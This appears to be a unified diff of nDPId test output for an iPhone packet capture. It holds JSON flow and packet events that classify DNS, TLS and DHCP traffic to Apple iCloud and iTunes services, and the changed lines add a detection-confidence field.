+01337{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":332,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454599740,"flow_last_seen":1582454599814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4837,"flow_avg_l4_payload_len":604,"midstream":0,"ts_msec":1582454599814,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","server_names":"gateway-india.icloud.com,gateway-carry.icloud.com,gateway.icloud.com,gateway-australia.icloud.com,gateway-sandbox.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D2:DA:1C:68:0C:91:A7:DB:BA:B2:2D:29:06:DB:57:42:10:3D:3A:FE"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":338,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599929,"flow_last_seen":1582454599929,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1582454599929,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":65079,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1582454599929,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1582454599929,"pkt":"xiwDYGpkxGGLNYKpCABFAABDumIAAP8Re+TAqAIRwKgCAf43ADUALyJV0zQBAAABAAAAAAAABHBsYXkGaXR1bmVzBWFwcGxlA2NvbQAAAQAB"}
-00746{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599929,"flow_last_seen":1582454599929,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1582454599929,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":65079,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"play.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599929,"flow_last_seen":1582454599929,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1582454599929,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":65079,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"play.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":340,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1582454599930,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"ts_msec":1582454599930,"pkt":"xGGLNYKpxiwDYGpkCABFAADjtQsAAEARP5zAqAIBwKgCEQA1\/jcAz3eX0zSBgAABAAUAAAAABHBsYXkGaXR1bmVzBWFwcGxlA2NvbQAAAQABwAwABQABAAAMOwAmCHBsYXktY2RuDGl0dW5lcy1hcHBsZQNjb20GYWthZG5zA25ldADAMwAFAAEAAAOmACIEcGxheQZpdHVuZXMFYXBwbGUDY29tCWVkZ2VzdWl0ZcBUwGUABQABAAAAXgAUBWExODA2BGRzY2IGYWthbWFpwFTAkwABAAEAAAAOAARce00awJMAAQABAAAADgAEXHtNQA=="}
-00762{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":340,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454599929,"flow_last_seen":1582454599930,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"ts_msec":1582454599930,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":65079,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"play.itunes.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.123.77.26"}}
+00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":340,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454599929,"flow_last_seen":1582454599930,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"ts_msec":1582454599930,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":65079,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"play.itunes.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.123.77.26"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599934,"flow_last_seen":1582454599934,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454599934,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1582454599934,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1582454599934,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGzmnAqAIRXHtNGsWbAbupO4D5AAAAALDC\/\/\/ZMQAAAgQFtAEDAwcBAQgKEd\/tTwAAAAAEAgAA"}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1582454599967,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454599967,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGGW5ce00awKgCEQG7xZtUZWomqTuA+qBScSDQrwAAAgQFrAQCCAozMbcgEd\/tTwEDAwc="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1582454600080,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1582454600080,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGznXAqAIRXHtNGsWbAbupO4D6VGVqJ4AQBAtsOAAAAQEIChHf7eAzMbcg"}
-00881{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":352,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599934,"flow_last_seen":1582454600080,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454600080,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00922{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":364,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599934,"flow_last_seen":1582454600116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1582454600116,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"play.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":352,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599934,"flow_last_seen":1582454600080,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454600080,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":364,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599934,"flow_last_seen":1582454600116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1582454600116,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"play.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454600454,"flow_last_seen":1582454600454,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1582454600454,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63677,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1582454600454,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1582454600454,"pkt":"xiwDYGpkxGGLNYKpCABFAABDtJ8AAP8RgafAqAIRwKgCAfi9ADUAL+BtI4YBAAABAAAAAAAABHN5bmMGaXR1bmVzBWFwcGxlA2NvbQAAAQAB"}
-00746{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454600454,"flow_last_seen":1582454600454,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1582454600454,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63677,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"sync.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454600454,"flow_last_seen":1582454600454,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1582454600454,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63677,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"sync.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1582454600494,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"ts_msec":1582454600494,"pkt":"xGGLNYKpxiwDYGpkCABFAADQcdgAAEARguLAqAIBwKgCEQA1+L0AvB7yI4aBgAABAAQAAAAABHN5bmMGaXR1bmVzBWFwcGxlA2NvbQAAAQABwAwABQABAAAF1gAmCHN5bmMtY2RuDGl0dW5lcy1hcHBsZQNjb20GYWthZG5zA25ldADAMwAFAAEAAAWqABsGaXR1bmVzBWFwcGxlA2NvbQdlZGdla2V5wFTAZQAFAAEAABGWABgEZTY3MwVkc2NlOQpha2FtYWllZGdlwFTAjAABAAEAAAAYAARfZRg1"}
-00762{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":422,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454600454,"flow_last_seen":1582454600494,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"ts_msec":1582454600494,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63677,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"sync.itunes.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.24.53"}}
+00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":422,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454600454,"flow_last_seen":1582454600494,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"ts_msec":1582454600494,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63677,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"sync.itunes.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.24.53"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454600508,"flow_last_seen":1582454600508,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454600508,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1582454600508,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1582454600508,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAGXAqAIRX2UYNcWcAbsi3fgeAAAAALDC\/\/8YLgAAAgQFtAEDAwcBAQgKEd\/vhgAAAAAEAgAA"}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1582454600541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454600541,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGS2lfZRg1wKgCEQG7xZzFmLU\/It34H6BScSB2MAAAAgQFrAQCCAqI0z6tEd\/vhgEDAwc="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1582454600545,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1582454600545,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAHHAqAIRX2UYNcWcAbsi3fgfxZi1QIAQBAsSJAAAAQEIChHf76yI0z6t"}
-00881{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454600508,"flow_last_seen":1582454600545,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454600545,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sync.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00922{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":432,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454600508,"flow_last_seen":1582454600580,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1582454600580,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sync.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1582454598252,"flow_last_seen":1582454599058,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12558,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1582454598587,"flow_last_seen":1582454600617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10875,"flow_avg_l4_payload_len":241,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":77,"flow_first_seen":1582454598721,"flow_last_seen":1582454600748,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":73228,"flow_avg_l4_payload_len":951,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}}
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1582454599225,"flow_last_seen":1582454600287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7909,"flow_avg_l4_payload_len":247,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}}
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1582454599740,"flow_last_seen":1582454600279,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7913,"flow_avg_l4_payload_len":263,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598542,"flow_last_seen":1582454598582,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52852,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598205,"flow_last_seen":1582454598247,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63143,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}}
-00642{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1582454553219,"flow_last_seen":1582454596366,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":2100,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"}}
